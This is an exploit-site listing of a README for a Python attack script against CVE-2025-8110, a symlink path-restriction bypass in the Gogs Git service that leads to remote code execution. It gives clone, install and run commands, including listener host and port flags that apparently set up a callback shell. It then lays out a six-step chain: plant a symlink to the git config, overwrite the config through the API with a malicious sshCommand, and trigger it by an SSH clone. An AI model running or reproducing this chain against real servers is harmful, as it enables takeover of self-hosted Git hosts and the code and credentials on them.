## https://sploitus.com/exploit?id=950D847D-3640-59D5-A5A4-1BB67F683717
# GOGS RCE cve-2025-8110
Gogs is a lightweight and self-hosted Git service similar to a private version of GitHub, designed to run easily on low-resource servers. The CVE-2025-8110 vulnerability is a critical security flaw that allows an attacker to bypass path restrictions by using symlinks. By uploading a malicious link pointing to .api/config, an attacker can use the gogs api to embed a malicious config file with the sshCommand parameter and achieve RCE on the host server.
---
---
## Usage
1. Clone this repo to your local machine:
```shell
git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
cd ./cve-2025-8110-GOGS-RCE
```
---
2. Install all dependencies
```shell
pip3 install -r ./requirements.txt
```
---
3. Run the script
```shell
# Print help
python3 ./cve-2025-8110.py --help
# Execute the attack chain with register step
python3 ./cve-2025-8110.py --url http:// -lh -lp
# Execute the attack chain skipping register | useful when register func returns err statement
python3 ./cve-2025-8110.py --url http:// -lh -lp -U -P
```
---
---
## How does it work
This script follows an attack chain involving these steps:
```
1. Register & authenticate a throwaway account (Register skipped if creds are provided with -U and -P flags)
2. Obtain an API bearer token
3. Create an auto-initialised repository
4. Clone the repo locally and push a relative symlink malicious_link -> .git/config
5. PUT the malicious git config (with sshCommand) through the symlink via the PutContents API
6. Trigger the sshCommand by cloning the repo over SSH
```
## Credits
This script was made using zAbuQasem (https://github.com/zAbuQasem) poc